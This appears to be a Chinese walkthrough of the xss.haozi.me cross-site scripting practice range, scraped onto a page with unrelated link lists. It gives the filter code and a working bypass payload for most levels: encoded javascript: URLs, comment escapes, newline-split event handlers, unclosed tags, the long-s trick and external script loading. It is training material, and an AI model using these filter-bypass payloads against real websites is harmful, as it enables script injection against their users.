当前位置: 首页 > news >正文

临沂哪里有做网站的所有的竞价托管公司

news 2025/9/17 17:36:27
临沂哪里有做网站的,所有的竞价托管公司,郴州seo快速排名,常州网站建设企业网站制作靶场地址alert(1) 1、第一关 输入在文本框里面,我们闭合前面的标签,中间的内容我们就可以随意写了 2、第二关 逃逸value的属性即可,这里使用点击事件触发xss 3、第三关 看代码,使用了正则表达式,去掉了所有的括号字…

靶场地址alert(1)

1、第一关

输入在文本框里面,我们闭合前面的标签,中间的内容我们就可以随意写了

2、第二关

逃逸value的属性即可,这里使用点击事件触发xss

3、第三关

看代码,使用了正则表达式,去掉了所有的括号字符

/[()]/g是一个正则表达式,表示匹配字符串中包含的括号字符"()"。在正则表达式中,方括号[]表示字符集合,其中列出的字符表示需要匹配的字符。因此[()]表示匹配任何一个括号字符,即左括号"("或右括号")"。而后面的g标志表示全局匹配,即匹配整个字符串中的所有符合条件的部分,而不是只匹配第一个。

function render (input) {const stripBracketsRe = /[()]/ginput = input.replace(stripBracketsRe, '')return input
}

尝试编码绕过,但是因为在JavaScript里面不会解码,因此编码绕过失败

(1)a标签

我们使用a标签,里面使用编码却可以绕过,为啥?因为编码有顺序

在href里面,先是解析url编码,然后html实体编码,最后是JavaScript编码。所以在里面先被html实体编码解析过了,括号已经生成了

<a href="javascript:alert&#40;1&#41;">test</a>

(2)iframe标签

既然html在JavaScript前面,那么具有url编码的iframe标签也可以进行

<iframe src="javascript:alert&#40;1&#41;">test</iframe>

4、第四关

和上一关payload一样,只是增加了个反引号过滤罢了

5、第五关

让我们逃逸注释符

function render (input) {input = input.replace(/-->/g, '😂')return '<!-- ' + input + ' -->'
}
--!><script>alert(1)</script>

上面这种可以闭合

6、第六关

源码过滤了以auto或on开头并且结尾是=的字符串,替换成_了,我们可以使用换行来分开这串字符串

function render (input) {input = input.replace(/auto|on.*=|>/ig, '_')return `<input value=1 ${input} type="text">`
}

payload

onclick
=alert(1)

7、第七关

源码过滤了html的常用标签符号,当我们尝试<>,就会过滤掉,因此绕过方法是使用单标签不完全闭合。

function render (input) {const stripTagsRe = /<\/?[^>]+>/giinput = input.replace(stripTagsRe, '')return `<article>${input}</article>`
}
<img src=x onerror="alert(1)"

8、第八关

正则过滤了</script>,和前面一关很像,直接换行过滤即可

</style
>
<script>alert(1)</script>
<style>

9、第九关

https://www.segmentfault.com"></script><script>alert(1)</script>//

https://www.segmentfault.com.haozi.me/j.js

10、0x0A

URL重定向

https://www.segmentfault.com.haozi.me/j.js

11、0x0B

源码将输入的转成大写了,JavaScript肯定不行了,但是HTML不区分大小写,符号和数字也不会,那就用编码呗

function render (input) {input = input.toUpperCase()return `<h1>${input}</h1>`
}
<img src="" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

12、0x0C

和上一关payload一样,编码绕过大写即可

13、0x0D

这一关过滤了< " '而且前面还有注释,我们使用换行绕过//,使用-->注释掉


alert(1)
-->

14、0x0E

源码将html的标签转换为以_开头,所有输入转为大写

function render (input) {input = input.replace(/<([a-zA-Z])/g, '<_$1')input = input.toUpperCase()return '<h1>' + input + '</h1>'
}

特殊技巧用ſ字符可以替换s

<ſcript src="https://xss.haozi.me/j.js"></script>

15、0x0F

闭合括号就行

');alert('1

16、第十关

直接闭合前面的<script标签即可>

</script><script>alert(1)

17、第十一关

还是闭合加注释即可

");alert(1)//

18、第十二关

转义转义我们的转义符号

\");alert(1)//

Yes 结束!

http://www.yayakq.cn/news/109866/

相关文章:

  • 网站怎么做动态图青浦网站建设su35
  • 阿里云是不是做网站的大型建站公司
  • 网站名查找做网站需要什么步骤
  • 阜阳网站建设云平台阿里云网站实名认证
  • 网站子站建设合同样本百度推广关键词排名规则
  • 网站页面布局设计建筑设计自学教程
  • 北京朝阳区建设工作办公网站鲸影视官方网站下载
  • 东莞市手机网站建设多少钱代理软件
  • 视频在线观看网站怎么建设苏州网站开发找哪家
  • 网站htm建设iis怎么做网站空间
  • 售后服务网站建设人力资源公司代缴社保合法吗
  • 宁波网站建设服务提供商南京明辉建设集团有限公司网站
  • 网站改版 重定向做贷超网站 前期需要什么分析
  • 西安买公司的网站建设口腔医院东莞网站建设
  • 深圳网站制作教程wordpress主题煎蛋
  • seo包括网站建设吗北京住房投资建设中心网站首页
  • 做网站还是app好网站前台设计
  • 交互比较好的网站个人备案网站能做什么
  • 网站建设与管理读书心得四川公共资源交易网查看招标公告
  • 著名的网站制作公司北京网站开发联系电话
  • 品牌网站建设费我的网站模板下载 迅雷下载 迅雷下载
  • 哪些网站可以免费发广告如何侵入网站服务器
  • 网站开发与桌面应用开发wordpress调用帖子
  • 上海站群优化长沙网络营销公司有哪些
  • 网站类网站开发犯罪吗网站的流量是怎么算的
  • 网站建设经典案例wordpress页面提交参数
  • 河北省住房和城身建设厅网站做招聘网站创业
  • 网站修改图片怎么做wordpress tag伪静态
  • 宁波建设监理管理协会网站seo推广培训费用
  • 网络营销基础战略优化技术基础